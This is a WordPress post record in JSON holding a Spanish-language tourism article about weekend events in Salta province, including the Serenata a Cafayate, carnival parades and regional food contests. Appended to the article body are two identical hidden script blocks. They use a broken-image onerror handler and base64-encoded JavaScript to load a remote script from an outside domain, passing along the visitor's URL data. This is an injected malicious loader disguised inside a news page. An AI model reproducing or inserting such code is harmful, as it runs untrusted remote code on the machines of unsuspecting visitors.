{"id":3750,"date":"2024-02-23T10:26:55","date_gmt":"2024-02-23T13:26:55","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3750"},"modified":"2025-08-13T23:59:56","modified_gmt":"2025-08-14T02:59:56","slug":"fin-de-semana-para-disfrutar-de-serenata-carnaval-y-gastronomia","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3750","title":{"rendered":"Fin de semana para disfrutar de Serenata, carnaval y gastronom\u00eda"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-4fb425695803e5c90a84ac30d71f0f5c\" style=\"background-color:#76112a\"><em>Salta te propone vivir este fin de semana diversas experiencias tur\u00edsticas a lo largo y ancho de la provincia, entre las que se destacan la Serenata a Cafayate, corsos en Tartagal y Chicoana, y diferentes concursos gastron\u00f3micos en San Carlos, Campo Quijano, El Carril y Guachipas.<\/em><\/h4>\n\n\n\n<p>El Ministerio de Turismo y Deportes cuenta con un completo programa de actividades, organizadas por el sector privado y por los gobiernos municipales de las siete regiones tur\u00edsticas de la provincia, para que salte\u00f1os y visitantes puedan disfrutar durante estas vacaciones. El calendario completo se puede consultar en\u00a0<a href=\"http:\/\/www.visitsalta.ar\/\" target=\"_blank\" rel=\"noopener\" title=\"\">www.visitsalta.ar<\/a>\u00a0o en\u00a0<a href=\"http:\/\/www.saltacalendario.gob.ar\/\" target=\"_blank\" rel=\"noopener\" title=\"\">www.saltacalendario.gob.ar<\/a><\/p>\n\n\n\n<p>A continuaci\u00f3n las actividades que se realizar\u00e1n hasta&nbsp;el domingo 25 de febrero. Los horarios se pueden consultar en los centros de visitantes de cada lugar.<\/p>\n\n\n\n<p>En la localidad de Cafayate comenz\u00f3 anoche, con una gran convocatoria de salte\u00f1os y turistas, la 50\u00ba edici\u00f3n de la Serenata a Cafayate donde Abel Pintos deleit\u00f3 con su m\u00fasica a todos los presentes. El escenario Payo Sol\u00e1 de la Bodega Encantada recibir\u00e1 hasta el 24 de febrero a distintos artistas de renombre y trayectoria como Luciano Pereyra, Chaque\u00f1o Palavecino, Bruno Arias, y muchos m\u00e1s.<\/p>\n\n\n\n<p>En tanto durante estos d\u00edas, la gastronom\u00eda salte\u00f1a se podr\u00e1 disfrutar en diferentes localidades con los concursos de la Cabeza Guateada en la Estaci\u00f3n Zuvir\u00eda de El Carril, de la Tortilla a la Parrilla en Campo Quijano y de la empanada en Cerrillos, Guachipas y San Carlos.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/11009-foto-de-archivo.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/11009-foto-de-archivo.jpg\" alt=\"Foto de Archivo.\"\/><\/a><\/figure>\n\n\n\n<p>En tanto, hoy viernes 23 se realizar\u00e1n los Corsos Color en el municipio de Tartagal, y el s\u00e1bado 24 el Corso de la Tradici\u00f3n y el domingo 25 el Corso Infantil y de las mascotas en el Cors\u00f3dromo B\u00ba Batalla de Salta de la localidad de Chicoana.<\/p>\n\n\n\n<p><strong>M\u00e1s actividades<\/strong><\/p>\n\n\n\n<p>En el Museo Hist\u00f3rico del Norte de la Ciudad de Salta se desarrollar\u00e1 durante todo el fin de semana diferentes actividades como la Trivia Hist\u00f3rica en el Cabildo \u00bfCu\u00e1nto sabes sobre historia?, una kermes con un espacio permanente con juegos grupales e individuales para disfrutar en familia, y el taller de cer\u00e1mica EmbarrARTE.<\/p>\n\n\n\n<p>En el municipio de San Lorenzo se puede disfrutar los jueves y s\u00e1bado desde las 16 y los domingo desde las 9 de un Mini Trekking guiado por la Reserva Las Yungas, esta actividad requiere inscripci\u00f3n previa; en tanto en la Quebrada se llevar\u00e1 adelante un taller de danzas folcl\u00f3ricas y el s\u00e1bado y domingo se podr\u00e1 participar de la Feria Gastron\u00f3mica El Zorzal con la m\u00e1s variada oferta gastron\u00f3mica regional.<\/p>\n\n\n\n<p>Por otro lado en San Antonio de los Cobres del jueves al domingo se podr\u00e1 realizar una caminata guiada por el pueblo para conocer sus atractivos y recorrer el Mercado Artesanal. Esos d\u00edas adem\u00e1s en la localidad de La Caldera estar\u00e1 abierta la pileta municipal.<\/p>\n\n\n\n<p>Traslad\u00e1ndonos al Valle de Lerma, en la localidad de El Carril durante todo el fin de semana vivir\u00e1 un Verano Explosivo con tapeo regional y los mejores vinos salte\u00f1os. Asimismo en Campo Quijano el domingo 25 se podr\u00e1 disfrutar de distintas actividades como la visita al Museo del Tren, &nbsp;la bendici\u00f3n de Santiago Ap\u00f3stol Peregrino, cuya imagen se asomar\u00e1 al balc\u00f3n a las 12:15; y las ferias que se realizar\u00e1n en la Plaza Mart\u00edn Fierro de la localidad y en la Plaza 8 de diciembre de La Silleta.<\/p>\n\n\n\n<p>En tanto en el municipio de Vaqueros el s\u00e1bado se desarrollar\u00e1 la Feria municipal y de emprendedores en el Predio de la Agrupaci\u00f3n Gauchos de G\u00fcemes donde habr\u00e1 artesanos, peque\u00f1os productores, dise\u00f1o, ropa, objetos, plantas y gastronom\u00eda.<\/p>\n\n\n\n<p>En los Valles Calchaqu\u00edes, Cachi propone distintas actividades, del jueves al domingo, desde las 9 se desarrollar\u00e1 la actividad Turismo Rural Comunitario El Toste visitando familias productoras y artesanas, y Turismo Con Identidad recorriendo distintos sitios arqueol\u00f3gicos.<\/p>\n\n\n\n<p>Tambi\u00e9n en la localidad habr\u00e1 un patio de juegos y muestras que se renovar\u00e1n cada 15 d\u00edas en el Museo Arqueol\u00f3gico; y se realizar\u00e1n recorridos guiados por los Sitios Arqueol\u00f3gicos El Tero y Las Pailas.<\/p>\n\n\n\n<p>A estas actividades se suma la oferta de aventura, naturaleza y gastronom\u00eda que invitan a disfrutar de Salta con todos los sentidos; desde el aire en globo aerost\u00e1tico, rafting en el ca\u00f1\u00f3n del r\u00edo Juramento, actividades n\u00e1uticas en el dique Cabra Corral, de una empanadas y de un vino de altura.<\/p>\n\n\n\n<p>El calendario completo se puede consultar en http:\/\/www.visitsalta.ar o en\u00a0<a href=\"http:\/\/www.saltacalendario.gob.ar\/\" target=\"_blank\" rel=\"noopener\" title=\"\">http:\/\/www.saltacalendario.gob.ar<\/a><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/se-viene-un-fin-de-semana-para-disfrutar-de-serenata-carnaval-y-gastronomia-94301\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Salta te propone vivir este fin de semana diversas experiencias tur\u00edsticas a lo largo y ancho de la provincia, entre las que se destacan la Serenata a Cafayate, corsos en Tartagal y Chicoana, y diferentes concursos gastron\u00f3micos en San Carlos, Campo Quijano, El Carril y Guachipas. El Ministerio de Turismo y Deportes cuenta con un [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3751,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[13],"tags":[],"class_list":{"0":"post-3750","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-festivales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3750"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3750"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3750\/revisions"}],"predecessor-version":[{"id":6843,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3750\/revisions\/6843"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3751"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3750"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3750"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3750"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}